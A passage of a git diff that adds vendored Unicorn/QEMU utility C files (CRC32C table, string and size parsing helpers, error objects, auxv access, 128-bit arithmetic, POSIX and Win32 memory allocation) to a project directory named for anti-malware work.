0xD4CA64EBL, + 0x8AD958CFL, 0x78B2DBCCL, 0x6BE22838L, 0x9989AB3BL, + 0x4D43CFD0L, 0xBF284CD3L, 0xAC78BF27L, 0x5E133C24L, + 0x105EC76FL, 0xE235446CL, 0xF165B798L, 0x030E349BL, + 0xD7C45070L, 0x25AFD373L, 0x36FF2087L, 0xC494A384L, + 0x9A879FA0L, 0x68EC1CA3L, 0x7BBCEF57L, 0x89D76C54L, + 0x5D1D08BFL, 0xAF768BBCL, 0xBC267848L, 0x4E4DFB4BL, + 0x20BD8EDEL, 0xD2D60DDDL, 0xC186FE29L, 0x33ED7D2AL, + 0xE72719C1L, 0x154C9AC2L, 0x061C6936L, 0xF477EA35L, + 0xAA64D611L, 0x580F5512L, 0x4B5FA6E6L, 0xB93425E5L, + 0x6DFE410EL, 0x9F95C20DL, 0x8CC531F9L, 0x7EAEB2FAL, + 0x30E349B1L, 0xC288CAB2L, 0xD1D83946L, 0x23B3BA45L, + 0xF779DEAEL, 0x05125DADL, 0x1642AE59L, 0xE4292D5AL, + 0xBA3A117EL, 0x4851927DL, 0x5B016189L, 0xA96AE28AL, + 0x7DA08661L, 0x8FCB0562L, 0x9C9BF696L, 0x6EF07595L, + 0x417B1DBCL, 0xB3109EBFL, 0xA0406D4BL, 0x522BEE48L, + 0x86E18AA3L, 0x748A09A0L, 0x67DAFA54L, 0x95B17957L, + 0xCBA24573L, 0x39C9C670L, 0x2A993584L, 0xD8F2B687L, + 0x0C38D26CL, 0xFE53516FL, 0xED03A29BL, 0x1F682198L, + 0x5125DAD3L, 0xA34E59D0L, 0xB01EAA24L, 0x42752927L, + 0x96BF4DCCL, 0x64D4CECFL, 0x77843D3BL, 0x85EFBE38L, + 0xDBFC821CL, 0x2997011FL, 0x3AC7F2EBL, 0xC8AC71E8L, + 0x1C661503L, 0xEE0D9600L, 0xFD5D65F4L, 0x0F36E6F7L, + 0x61C69362L, 0x93AD1061L, 0x80FDE395L, 0x72966096L, + 0xA65C047DL, 0x5437877EL, 0x4767748AL, 0xB50CF789L, + 0xEB1FCBADL, 0x197448AEL, 0x0A24BB5AL, 0xF84F3859L, + 0x2C855CB2L, 0xDEEEDFB1L, 0xCDBE2C45L, 0x3FD5AF46L, + 0x7198540DL, 0x83F3D70EL, 0x90A324FAL, 0x62C8A7F9L, + 0xB602C312L, 0x44694011L, 0x5739B3E5L, 0xA55230E6L, + 0xFB410CC2L, 0x092A8FC1L, 0x1A7A7C35L, 0xE811FF36L, + 0x3CDB9BDDL, 0xCEB018DEL, 0xDDE0EB2AL, 0x2F8B6829L, + 0x82F63B78L, 0x709DB87BL, 0x63CD4B8FL, 0x91A6C88CL, + 0x456CAC67L, 0xB7072F64L, 0xA457DC90L, 0x563C5F93L, + 0x082F63B7L, 0xFA44E0B4L, 0xE9141340L, 0x1B7F9043L, + 0xCFB5F4A8L, 0x3DDE77ABL, 0x2E8E845FL, 0xDCE5075CL, + 0x92A8FC17L, 0x60C37F14L, 0x73938CE0L, 0x81F80FE3L, + 0x55326B08L, 0xA759E80BL, 0xB4091BFFL, 0x466298FCL, + 0x1871A4D8L, 0xEA1A27DBL, 0xF94AD42FL, 0x0B21572CL, + 0xDFEB33C7L, 0x2D80B0C4L, 0x3ED04330L, 0xCCBBC033L, + 0xA24BB5A6L, 0x502036A5L, 0x4370C551L, 0xB11B4652L, + 0x65D122B9L, 0x97BAA1BAL, 0x84EA524EL, 0x7681D14DL, + 0x2892ED69L, 0xDAF96E6AL, 0xC9A99D9EL, 0x3BC21E9DL, + 0xEF087A76L, 0x1D63F975L, 0x0E330A81L, 0xFC588982L, + 0xB21572C9L, 0x407EF1CAL, 0x532E023EL, 0xA145813DL, + 0x758FE5D6L, 0x87E466D5L, 0x94B49521L, 0x66DF1622L, + 0x38CC2A06L, 0xCAA7A905L, 0xD9F75AF1L, 0x2B9CD9F2L, + 0xFF56BD19L, 0x0D3D3E1AL, 0x1E6DCDEEL, 0xEC064EEDL, + 0xC38D26C4L, 0x31E6A5C7L, 0x22B65633L, 0xD0DDD530L, + 0x0417B1DBL, 0xF67C32D8L, 0xE52CC12CL, 0x1747422FL, + 0x49547E0BL, 0xBB3FFD08L, 0xA86F0EFCL, 0x5A048DFFL, + 0x8ECEE914L, 0x7CA56A17L, 0x6FF599E3L, 0x9D9E1AE0L, + 0xD3D3E1ABL, 0x21B862A8L, 0x32E8915CL, 0xC083125FL, + 0x144976B4L, 0xE622F5B7L, 0xF5720643L, 0x07198540L, + 0x590AB964L, 0xAB613A67L, 0xB831C993L, 0x4A5A4A90L, + 0x9E902E7BL, 0x6CFBAD78L, 0x7FAB5E8CL, 0x8DC0DD8FL, + 0xE330A81AL, 0x115B2B19L, 0x020BD8EDL, 0xF0605BEEL, + 0x24AA3F05L, 0xD6C1BC06L, 0xC5914FF2L, 0x37FACCF1L, + 0x69E9F0D5L, 0x9B8273D6L, 0x88D28022L, 0x7AB90321L, + 0xAE7367CAL, 0x5C18E4C9L, 0x4F48173DL, 0xBD23943EL, + 0xF36E6F75L, 0x0105EC76L, 0x12551F82L, 0xE03E9C81L, + 0x34F4F86AL, 0xC69F7B69L, 0xD5CF889DL, 0x27A40B9EL, + 0x79B737BAL, 0x8BDCB4B9L, 0x988C474DL, 0x6AE7C44EL, + 0xBE2DA0A5L, 0x4C4623A6L, 0x5F16D052L, 0xAD7D5351L +}; + + +uint32_t crc32c(uint32_t crc, const uint8_t *data, unsigned int length) +{ + while (length--) { + crc = crc32c_table[(crc ^ *data++) & 0xFFL] ^ (crc >> 8); + } + return crc^0xffffffff; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/cutils.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/cutils.c new file mode 100644 index 0000000..9a6cbdb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/cutils.c @@ -0,0 +1,157 @@ +/* + * Simple C functions to supplement the C library + * + * Copyright (c) 2006 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#include "qemu-common.h" +#include "qemu/host-utils.h" +#include +#include +#include + + +void pstrcpy(char *buf, int buf_size, const char *str) +{ + int c; + char *q = buf; + + if (buf_size <= 0) + return; + + for(;;) { + c = *str++; + if (c == 0 || q >= buf + buf_size - 1) + break; + *q++ = c; + } + *q = '\0'; +} + +/* strcat and truncate. */ +char *pstrcat(char *buf, int buf_size, const char *s) +{ + int len; + len = strlen(buf); + if (len < buf_size) + pstrcpy(buf + len, buf_size - len, s); + return buf; +} + +int strstart(const char *str, const char *val, const char **ptr) +{ + const char *p, *q; + p = str; + q = val; + while (*q != '\0') { + if (*p != *q) + return 0; + p++; + q++; + } + if (ptr) + *ptr = p; + return 1; +} + +int qemu_fls(int i) +{ + return 32 - clz32(i); +} + +static int64_t suffix_mul(char suffix, int64_t unit) +{ + switch (qemu_toupper(suffix)) { + case STRTOSZ_DEFSUFFIX_B: + return 1; + case STRTOSZ_DEFSUFFIX_KB: + return unit; + case STRTOSZ_DEFSUFFIX_MB: + return unit * unit; + case STRTOSZ_DEFSUFFIX_GB: + return unit * unit * unit; + case STRTOSZ_DEFSUFFIX_TB: + return unit * unit * unit * unit; + case STRTOSZ_DEFSUFFIX_PB: + return unit * unit * unit * unit * unit; + case STRTOSZ_DEFSUFFIX_EB: + return unit * unit * unit * unit * unit * unit; + } + return -1; +} + +/* + * Convert string to bytes, allowing either B/b for bytes, K/k for KB, + * M/m for MB, G/g for GB or T/t for TB. End pointer will be returned + * in *end, if not NULL. Return -ERANGE on overflow, Return -EINVAL on + * other error. + */ +int64_t strtosz_suffix_unit(const char *nptr, char **end, + const char default_suffix, int64_t unit) +{ + int64_t retval = -EINVAL; + char *endptr; + unsigned char c; + int mul_required = 0; + double val, mul, integral, fraction; + + errno = 0; + val = strtod(nptr, &endptr); + if (isnan(val) || endptr == nptr || errno != 0) { + goto fail; + } + fraction = modf(val, &integral); + if (fraction != 0) { + mul_required = 1; + } + c = *endptr; + mul = (double)suffix_mul(c, unit); + if (mul >= 0) { + endptr++; + } else { + mul = (double)suffix_mul(default_suffix, unit); + assert(mul >= 0); + } + if (mul == 1 && mul_required) { + goto fail; + } + if ((val * mul >= (double)INT64_MAX) || val < 0) { + retval = -ERANGE; + goto fail; + } + retval = (int64_t)(val * mul); + +fail: + if (end) { + *end = endptr; + } + + return retval; +} + +int64_t strtosz_suffix(const char *nptr, char **end, const char default_suffix) +{ + return strtosz_suffix_unit(nptr, end, default_suffix, 1024); +} + +int64_t strtosz(const char *nptr, char **end) +{ + return strtosz_suffix(nptr, end, STRTOSZ_DEFSUFFIX_MB); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/error.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/error.c new file mode 100644 index 0000000..7dc0bcc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/error.c @@ -0,0 +1,129 @@ +/* + * QEMU Error Objects + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2. See + * the COPYING.LIB file in the top-level directory. + */ + +#include "qemu-common.h" +#include "qapi/error.h" + +struct Error +{ + char *msg; + ErrorClass err_class; +}; + +Error *error_abort; + +void error_set(Error **errp, ErrorClass err_class, const char *fmt, ...) +{ + Error *err; + va_list ap; + int saved_errno = errno; + + if (errp == NULL) { + return; + } + assert(*errp == NULL); + + err = g_malloc0(sizeof(*err)); + + va_start(ap, fmt); + err->msg = g_strdup_vprintf(fmt, ap); + va_end(ap); + err->err_class = err_class; + + if (errp == &error_abort) { + // abort(); + } + + *errp = err; + + errno = saved_errno; +} + +void error_set_errno(Error **errp, int os_errno, ErrorClass err_class, + const char *fmt, ...) +{ + Error *err; + char *msg1; + va_list ap; + int saved_errno = errno; + + if (errp == NULL) { + return; + } + assert(*errp == NULL); + + err = g_malloc0(sizeof(*err)); + + va_start(ap, fmt); + msg1 = g_strdup_vprintf(fmt, ap); + if (os_errno != 0) { + err->msg = g_strdup_printf("%s: %s", msg1, strerror(os_errno)); + g_free(msg1); + } else { + err->msg = msg1; + } + va_end(ap); + err->err_class = err_class; + + if (errp == &error_abort) { + // abort(); + } + + *errp = err; + + errno = saved_errno; +} + +void error_setg_file_open(Error **errp, int os_errno, const char *filename) +{ + error_setg_errno(errp, os_errno, "Could not open '%s'", filename); +} + +Error *error_copy(const Error *err) +{ + Error *err_new; + + err_new = g_malloc0(sizeof(*err)); + err_new->msg = g_strdup(err->msg); + err_new->err_class = err->err_class; + + return err_new; +} + +ErrorClass error_get_class(const Error *err) +{ + return err->err_class; +} + +const char *error_get_pretty(Error *err) +{ + return err->msg; +} + +void error_free(Error *err) +{ + if (err) { + g_free(err->msg); + g_free(err); + } +} + +void error_propagate(Error **dst_errp, Error *local_err) +{ + if (local_err && dst_errp == &error_abort) { + // abort(); + } else if (dst_errp && !*dst_errp) { + *dst_errp = local_err; + } else if (local_err) { + error_free(local_err); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/getauxval.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/getauxval.c new file mode 100644 index 0000000..208bfa3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/getauxval.c @@ -0,0 +1,109 @@ +/* + * QEMU access to the auxiliary vector + * + * Copyright (C) 2013 Red Hat, Inc + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "qemu-common.h" +#include "qemu/osdep.h" + +#ifdef CONFIG_GETAUXVAL +/* Don't inline this in qemu/osdep.h, because pulling in for + the system declaration of getauxval pulls in the system , which + conflicts with qemu's version. */ + +#include + +unsigned long qemu_getauxval(unsigned long key) +{ + return getauxval(key); +} +#elif defined(__linux__) +#include "elf.h" + +/* Our elf.h doesn't contain Elf32_auxv_t and Elf64_auxv_t, which is ok because + that just makes it easier to define it properly for the host here. */ +typedef struct { + unsigned long a_type; + unsigned long a_val; +} ElfW_auxv_t; + +static const ElfW_auxv_t *auxv; + +static const ElfW_auxv_t *qemu_init_auxval(void) +{ + ElfW_auxv_t *a; + ssize_t size = 512, r, ofs; + int fd; + + /* Allocate some initial storage. Make sure the first entry is set + to end-of-list, so that we've got a valid list in case of error. */ + auxv = a = g_malloc(size); + a[0].a_type = 0; + a[0].a_val = 0; + + fd = open("/proc/self/auxv", O_RDONLY); + if (fd < 0) { + return a; + } + + /* Read the first SIZE bytes. Hopefully, this covers everything. */ + r = read(fd, a, size); + + if (r == size) { + /* Continue to expand until we do get a partial read. */ + do { + ofs = size; + size *= 2; + auxv = a = g_realloc(a, size); + r = read(fd, (char *)a + ofs, ofs); + } while (r == ofs); +} + + close(fd); + return a; +} + +unsigned long qemu_getauxval(unsigned long type) +{ + const ElfW_auxv_t *a = auxv; + + if (unlikely(a == NULL)) { + a = qemu_init_auxval(); + } + + for (; a->a_type != 0; a++) { + if (a->a_type == type) { + return a->a_val; + } + } + + return 0; +} + +#else + +unsigned long qemu_getauxval(unsigned long type) +{ + return 0; +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/host-utils.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/host-utils.c new file mode 100644 index 0000000..5f1d7a7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/host-utils.c @@ -0,0 +1,167 @@ +/* + * Utility compute operations used by translated code. + * + * Copyright (c) 2003 Fabrice Bellard + * Copyright (c) 2007 Aurelien Jarno + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include +#include "unicorn/platform.h" +#include "qemu/host-utils.h" + +#ifndef CONFIG_INT128 +/* Long integer helpers */ +static inline void mul64(uint64_t *plow, uint64_t *phigh, + uint64_t a, uint64_t b) +{ + typedef union { + uint64_t ll; + struct { +#ifdef HOST_WORDS_BIGENDIAN + uint32_t high, low; +#else + uint32_t low, high; +#endif + } l; + } LL; + LL rl, rm, rn, rh, a0, b0; + uint64_t c; + + a0.ll = a; + b0.ll = b; + + rl.ll = (uint64_t)a0.l.low * b0.l.low; + rm.ll = (uint64_t)a0.l.low * b0.l.high; + rn.ll = (uint64_t)a0.l.high * b0.l.low; + rh.ll = (uint64_t)a0.l.high * b0.l.high; + + c = (uint64_t)rl.l.high + rm.l.low + rn.l.low; + rl.l.high = (uint32_t)c; + c >>= 32; + c = c + rm.l.high + rn.l.high + rh.l.low; + rh.l.low = (uint32_t)c; + rh.l.high += (uint32_t)(c >> 32); + + *plow = rl.ll; + *phigh = rh.ll; +} + +/* Unsigned 64x64 -> 128 multiplication */ +void mulu64 (uint64_t *plow, uint64_t *phigh, uint64_t a, uint64_t b) +{ + mul64(plow, phigh, a, b); +} + +/* Signed 64x64 -> 128 multiplication */ +void muls64 (uint64_t *plow, uint64_t *phigh, int64_t a, int64_t b) +{ + uint64_t rh; + + mul64(plow, &rh, a, b); + + /* Adjust for signs. */ + if (b < 0) { + rh -= a; + } + if (a < 0) { + rh -= b; + } + *phigh = rh; +} + +/* Unsigned 128x64 division. Returns 1 if overflow (divide by zero or */ +/* quotient exceeds 64 bits). Otherwise returns quotient via plow and */ +/* remainder via phigh. */ +int divu128(uint64_t *plow, uint64_t *phigh, uint64_t divisor) +{ + uint64_t dhi = *phigh; + uint64_t dlo = *plow; + unsigned i; + uint64_t carry = 0; + + if (divisor == 0) { + return 1; + } else if (dhi == 0) { + *plow = dlo / divisor; + *phigh = dlo % divisor; + return 0; + } else if (dhi > divisor) { + return 1; + } else { + + for (i = 0; i < 64; i++) { + carry = dhi >> 63; + dhi = (dhi << 1) | (dlo >> 63); + if (carry || (dhi >= divisor)) { + dhi -= divisor; + carry = 1; + } else { + carry = 0; + } + dlo = (dlo << 1) | carry; + } + + *plow = dlo; + *phigh = dhi; + return 0; + } +} + +int divs128(int64_t *plow, int64_t *phigh, int64_t divisor) +{ + int sgn_dvdnd = *phigh < 0; + int sgn_divsr = divisor < 0; + int overflow = 0; + + if (sgn_dvdnd) { + *plow = ~(*plow); + *phigh = ~(*phigh); + if (*plow == (int64_t)-1) { + *plow = 0; + (*phigh)++; + } else { + (*plow)++; + } + } + + if (sgn_divsr) { + divisor = 0 - divisor; + } + + overflow = divu128((uint64_t *)plow, (uint64_t *)phigh, (uint64_t)divisor); + + if (sgn_dvdnd ^ sgn_divsr) { + *plow = 0 - *plow; + } + + if (!overflow) { + if ((*plow < 0) ^ (sgn_dvdnd ^ sgn_divsr)) { + overflow = 1; + } + } + + return overflow; +} +#else +// avoid empty object file +void dummy_func(void); +void dummy_func(void) {} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/module.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/module.c new file mode 100644 index 0000000..9d9cd23 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/module.c @@ -0,0 +1,57 @@ +/* + * QEMU Module Infrastructure + * + * Copyright IBM, Corp. 2009 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU GPL, version 2. See + * the COPYING file in the top-level directory. + * + * Contributions after 2012-01-13 are licensed under the terms of the + * GNU GPL, version 2 or (at your option) any later version. + */ + +#include "qemu-common.h" +#include "qemu/queue.h" + +#include "uc_priv.h" + +static void init_lists(struct uc_struct *uc) +{ + int i; + + for (i = 0; i < MODULE_INIT_MAX; i++) { + QTAILQ_INIT(&uc->init_type_list[i]); + } +} + + +static ModuleTypeList *find_type(struct uc_struct *uc, module_init_type type) +{ + ModuleTypeList *l; + + init_lists(uc); + + l = &uc->init_type_list[type]; + + return l; +} + +static void module_load(module_init_type type) +{ +} + +void module_call_init(struct uc_struct *uc, module_init_type type) +{ + ModuleTypeList *l; + ModuleEntry *e; + + module_load(type); + l = find_type(uc, type); + + QTAILQ_FOREACH(e, l, node) { + e->init(); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/oslib-posix.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/oslib-posix.c new file mode 100644 index 0000000..3614205 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/oslib-posix.c @@ -0,0 +1,141 @@ +/* + * os-posix-lib.c + * + * Copyright (c) 2003-2008 Fabrice Bellard + * Copyright (c) 2010 Red Hat, Inc. + * + * QEMU library functions on POSIX which are shared between QEMU and + * the QEMU tools. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#if defined(__linux__) && (defined(__x86_64__) || defined(__arm__)) + /* Use 2 MiB alignment so transparent hugepages can be used by KVM. + Valgrind does not support alignments larger than 1 MiB, + therefore we need special code which handles running on Valgrind. */ +# define QEMU_VMALLOC_ALIGN (512 * 4096) +#elif defined(__linux__) && defined(__s390x__) + /* Use 1 MiB (segment size) alignment so gmap can be used by KVM. */ +# define QEMU_VMALLOC_ALIGN (256 * 4096) +#else +# define QEMU_VMALLOC_ALIGN getpagesize() +#endif +#define HUGETLBFS_MAGIC 0x958458f6 + +#include "unicorn/platform.h" +#include "config-host.h" +#include "sysemu/sysemu.h" +#include +#include +#include +#ifdef __HAIKU__ +#include +#else +#include +#endif + +#ifdef CONFIG_LINUX +#if !defined(__CYGWIN__) +#include +#endif +#include +#endif + +#ifdef __FreeBSD__ +#include +#endif + +void *qemu_oom_check(void *ptr) +{ + if (ptr == NULL) { + fprintf(stderr, "Failed to allocate memory: %s\n", strerror(errno)); + abort(); + } + return ptr; +} + +void *qemu_try_memalign(size_t alignment, size_t size) +{ + void *ptr; + + if (alignment < sizeof(void*)) { + alignment = sizeof(void*); + } + +#if defined(_POSIX_C_SOURCE) && !defined(__sun__) + int ret; + ret = posix_memalign(&ptr, alignment, size); + if (ret != 0) { + errno = ret; + ptr = NULL; + } +#elif defined(CONFIG_BSD) + ptr = valloc(size); +#else + ptr = memalign(alignment, size); +#endif + return ptr; +} + +void *qemu_memalign(size_t alignment, size_t size) +{ + return qemu_oom_check(qemu_try_memalign(alignment, size)); +} + +/* alloc shared memory pages */ +void *qemu_anon_ram_alloc(size_t size, uint64_t *alignment) +{ + size_t align = QEMU_VMALLOC_ALIGN; + size_t total = size + align - getpagesize(); + void *ptr = mmap(0, total, PROT_READ | PROT_WRITE, + MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); + size_t offset = QEMU_ALIGN_UP((uintptr_t)ptr, align) - (uintptr_t)ptr; + + if (ptr == MAP_FAILED) { + return NULL; + } + + if (alignment) { + *alignment = align; + } + ptr += offset; + total -= offset; + + if (offset > 0) { + munmap(ptr - offset, offset); + } + if (total > size) { + munmap(ptr + size, total - size); + } + + return ptr; +} + +void qemu_vfree(void *ptr) +{ + free(ptr); +} + +void qemu_anon_ram_free(void *ptr, size_t size) +{ + if (ptr) { + munmap(ptr, size); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/oslib-win32.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/oslib-win32.c new file mode 100644 index 0000000..cb60b98 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/oslib-win32.c @@ -0,0 +1,103 @@ +/* + * os-win32.c + * + * Copyright (c) 2003-2008 Fabrice Bellard + * Copyright (c) 2010 Red Hat, Inc. + * + * QEMU library functions for win32 which are shared between QEMU and + * the QEMU tools. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ +#include +#include + +#include +#include "config-host.h" +#include "sysemu/sysemu.h" + +/* this must come after including "trace.h" */ +/* The pragmas are to fix this issue: https://connect.microsoft.com/VisualStudio/feedback/details/976983 */ +#pragma warning(push) +#pragma warning(disable : 4091) +#include +#pragma warning(pop) + +void *qemu_oom_check(void *ptr) +{ + if (ptr == NULL) { + fprintf(stderr, "Failed to allocate memory: %lu\n", GetLastError()); + abort(); + } + return ptr; +} + +void *qemu_try_memalign(size_t alignment, size_t size) +{ + void *ptr; + + if (!size) { + abort(); + } + ptr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE); + // trace_qemu_memalign(alignment, size, ptr); + return ptr; +} + +void *qemu_memalign(size_t alignment, size_t size) +{ + return qemu_oom_check(qemu_try_memalign(alignment, size)); +} + +void *qemu_anon_ram_alloc(size_t size, uint64_t *align) +{ + void *ptr; + + /* FIXME: this is not exactly optimal solution since VirtualAlloc + has 64Kb granularity, but at least it guarantees us that the + memory is page aligned. */ + ptr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE); + // trace_qemu_anon_ram_alloc(size, ptr); + return ptr; +} + +void qemu_vfree(void *ptr) +{ + // trace_qemu_vfree(ptr); + if (ptr) { + VirtualFree(ptr, 0, MEM_RELEASE); + } +} + +void qemu_anon_ram_free(void *ptr, size_t size) +{ + // trace_qemu_anon_ram_free(ptr, size); + if (ptr) { + VirtualFree(ptr, 0, MEM_RELEASE); + } +} + +size_t getpagesize(void) +{ + SYSTEM_INFO system_info; + + GetSystemInfo(&system_info); + return system_info.dwPageSize; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-error.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-error.c new file mode 100644 index 0000000..88f89b7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-error.c @@ -0,0 +1,80 @@ +/* + * Error reporting + * + * Copyright (C) 2010 Red Hat Inc. + * + * Authors: + * Markus Armbruster , + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + */ + +#include +#include +#include + +static const char *progname; + +/* + * Set the program name for error_print_loc(). + */ +void error_set_progname(const char *argv0) +{ + const char *p = strrchr(argv0, '/'); + progname = p ? p + 1 : argv0; +} + +const char *error_get_progname(void) +{ + return progname; +} + +/* + * Print current location to current monitor if we have one, else to stderr. + */ +static void error_print_loc(void) +{ +} + +/* + * Print an error message to current monitor if we have one, else to stderr. + * Format arguments like vsprintf(). The result should not contain + * newlines. + * Prepend the current location and append a newline. + * It's wrong to call this in a QMP monitor. Use qerror_report() there. + */ +#ifdef _MSC_VER +void error_vreport(const char *fmt, va_list ap) +{ + error_print_loc(); + vfprintf(stderr, fmt, ap); + fprintf(stderr, "\n"); +} +#else +void error_vreport(const char *fmt, va_list ap) +{ + GTimeVal tv; + gchar *timestr; + + error_print_loc(); + error_vprintf(fmt, ap); + error_printf("\n"); +} +#endif + +/* + * Print an error message to current monitor if we have one, else to stderr. + * Format arguments like sprintf(). The result should not contain + * newlines. + * Prepend the current location and append a newline. + * It's wrong to call this in a QMP monitor. Use qerror_report() there. + */ +void error_report(const char *fmt, ...) +{ + va_list ap; + + va_start(ap, fmt); + error_vreport(fmt, ap); + va_end(ap); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-thread-posix.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-thread-posix.c new file mode 100644 index 0000000..c461144 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-thread-posix.c @@ -0,0 +1,86 @@ +/* + * Wrappers around mutex/cond/thread functions + * + * 